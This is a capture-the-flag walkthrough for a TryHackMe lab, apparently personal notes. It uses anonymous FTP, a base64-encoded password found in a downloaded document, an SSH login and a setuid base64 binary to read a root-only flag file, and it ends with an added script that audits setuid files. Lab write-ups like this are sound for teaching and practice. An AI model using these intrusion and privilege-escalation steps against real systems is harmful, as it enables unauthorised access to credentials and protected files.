Oh! JUN
[redraccoon] ## Catch me if you can ##
TryHackMe | Penetration Testing Basics
Red Raccoon penetration testing basics practice room
tryhackme.com
[Catch Me If You Can]
sudo nmap 10.10.247.147 -sS -T4
----------------------
PORT STATE SERVICE
21/tcp open ftp
22/tcp open ssh
80/tcp open http
----------------------
sudo nmap 10.10.247.147 -sV -T4 -sC -p 21,22,80
----------------------------------------------------------------------------------
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.3
| ftp-syst:
| STAT:
| FTP server status:
| Connected to ::ffff:10.4.61.73
| Logged in as ftp
| TYPE: ASCII
| No session bandwidth limit
| Session timeout in seconds is 300
| Control connection is plain text
| Data connections will be plain text
| At session startup, client count was 2
| vsFTPd 3.0.3 - secure, fast, stable
|_End of status
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| -rw-rw-r-- 1 1000 1000 0 Mar 12 2023 hiya
|_-rw-r--r-- 1 0 0 45 Mar 12 2023 temporary_pw.txt
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 128a28dd913a41fdaf6f3a3c4c43ea5c (RSA)
| 256 ab36d4c2a3438887d0892ebbb2ce0351 (ECDSA)
|_ 256 3ae52103c4deb9531ac6a966cbea1f1b (ED25519)
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
|_http-server-header: Apache/2.4.41 (Ubuntu)
| http-robots.txt: 1 disallowed entry
|_/dev/
|_http-title: Apache2 Ubuntu Default Page: It works
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
----------------------------------------------------------------------------------
ftp 10.10.247.147
-------------------
id : anonymous
pw : anonymous
-------------------
ftp> ls -alh
-------------------------------------------------------------------------
drwxrwxr-x 2 1000 1000 4096 Mar 12 2023 .
drwxrwxr-x 2 1000 1000 4096 Mar 12 2023 ..
-rwxrw-r-- 1 1000 1000 7173 Mar 12 2023 .ssh_creds.docx
-rw-rw-r-- 1 1000 1000 0 Mar 12 2023 hiya
-rw-r--r-- 1 0 0 45 Mar 12 2023 temporary_pw.txt
-------------------------------------------------------------------------
# Download the following files from '10.10.247.147' (connected over FTP) to 'kali'
ftp> get .ssh_creds.docx
ftp> get temporary_pw.txt
# Check on 'kali'
ls -a
----------------------------------------
temporary_pw.txt .ssh_creds.docx
----------------------------------------
cat temporary_pw.txt
--------------------------------------------
Do you see a docx file ? Read the docx file.
--------------------------------------------
# Read .ssh_creds.docx (the demo video does it this way, but it didn't work for me...)
libreoffice --cat .ssh_creds.docx
# Convert .ssh_creds.docx to output.txt
pandoc .ssh_creds.docx -t plain -o output.txt
# Print output.txt
cat output.txt
-------------------------------------------------------------------------
Hey, I created this document for you so you know my name right? That’s
my ssh id.
Encoded password just in case Y2F0Y2htZSFAIw==
-------------------------------------------------------------------------
# Base64-decode 'Y2F0Y2htZSFAIw=='
echo 'Y2F0Y2htZSFAIw==' | base64 -d
-----------
catchme!@#
-----------
# exiftool : reads the metadata of media files
exiftool .ssh_creds.docx
-------------------------------------------------------------------
ExifTool Version Number : 12.57
File Name : .ssh_creds.docx
Directory : .
File Size : 7.2 kB
File Modification Date/Time : 2023:03:11 21:31:40-05:00
File Access Date/Time : 2024:02:06 04:02:07-05:00
File Inode Change Date/Time : 2024:02:06 03:36:16-05:00
File Permissions : -rw-r--r--
File Type : DOCX
File Type Extension : docx
MIME Type : application/vnd.openxmlformats-officedocument.wordprocessingml.document
Zip Required Version : 20
Zip Bit Flag : 0x0808
Zip Compression : Deflated
Zip Modify Date : 1980:01:01 00:00:00
Zip CRC : 0x7f431349
Zip Compressed Size : 360
Zip Uncompressed Size : 1341
Zip File Name : word/numbering.xml
Creator : harry
-------------------------------------------------------------------
# SSH into the target server
ssh harry@10.10.247.147
----------------------
password : catchme!@#
----------------------
sudo find / -name "user.txt" 2>/dev/null
-----------------------------------
/home/harry/backup/user7/user.txt
/home/harry/backup/user16/user.txt
/home/harry/backup/user/user.txt
-----------------------------------
cat /home/harry/backup/user7/user.txt
----------------------
GROOT{C4TCHME_S3CRETS}
----------------------
sudo find / -name "flag.txt" 2>/dev/null
---------------
/root/flag.txt
---------------
# No permission to access flag.txt
cat /root/flag.txt
--------------------------------------
cat: /root/flag.txt: Permission denied
--------------------------------------
# -type f : regular files
# -perm -4000 : files with the 'setuid' bit set
find / -type f -perm -4000 -exec ls -h {} \; 2>/dev/null
----------------
/usr/bin/base64
----------------
# Because base64 has the SUID bit set, running it executes with the privileges of the file's owner.
base64 /root/flag.txt
----------------------------------------------------
UjFKUFQxUjdRelIwUTJ3cmJFMUZJV1o1TUZWak5FNTlDZz09Cg==
----------------------------------------------------
# Base64 decode
echo "UjFKUFQxUjdRelIwUTJ3cmJFMUZJV1o1TUZWak5FNTlDZz09Cg==" | base64 -d
------------------------------------
R1JPT1R7QzR0Q2wrbE1FIWZ5MFVjNE59Cg==
------------------------------------
# Base64 decode once more
echo "R1JPT1R7QzR0Q2wrbE1FIWZ5MFVjNE59Cg==" | base64 -d
------------------------
GROOT{C4tCl+lME!fy0Uc4N}
------------------------
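The defender's side of the SUID finding above, as an added example that is not part of the original write-up: a shell check that lists setuid files missing from an expected baseline, so a stray bit such as the one on /usr/bin/base64 stands out. The baseline list and the function names unexpected_suid and clear_suid are assumptions made for illustration.

```shell
#!/bin/sh
# Added example (not from the original write-up): list setuid files that are
# missing from an expected baseline, then clear the bit on a reviewed file.

# Assumed baseline of binaries that normally ship setuid on an Ubuntu host.
# Constructed for illustration; build the real list from a known-good install.
SUID_BASELINE='/usr/bin/passwd
/usr/bin/sudo
/usr/bin/su
/usr/bin/mount
/usr/bin/umount
/usr/bin/chsh
/usr/bin/chfn
/usr/bin/newgrp
/usr/bin/gpasswd'

# unexpected_suid ROOT
# Prints each regular file under ROOT that has the setuid bit and whose path
# (relative to ROOT) is not in SUID_BASELINE. ROOT may be "/" or a mounted image.
unexpected_suid() {
    root=${1%/}
    find "${root:-/}" -type f -perm -4000 2>/dev/null | sort |
    while IFS= read -r f; do
        rel=${f#"$root"}
        if ! printf '%s\n' "$SUID_BASELINE" | grep -Fxq -- "$rel"; then
            printf '%s\n' "$rel"
        fi
    done
}

# clear_suid FILE
# Removes the setuid bit and succeeds only if the bit is really gone.
clear_suid() {
    chmod u-s -- "$1" && [ ! -u "$1" ]
}

# Run as: sh suid_audit.sh /        (scan the live filesystem)
if [ "$#" -gt 0 ]; then
    unexpected_suid "$1"
fi
```

On the host in this write-up the check would report /usr/bin/base64, and clearing the bit on it would make the later `base64 /root/flag.txt` fail with the same permission error as `cat`.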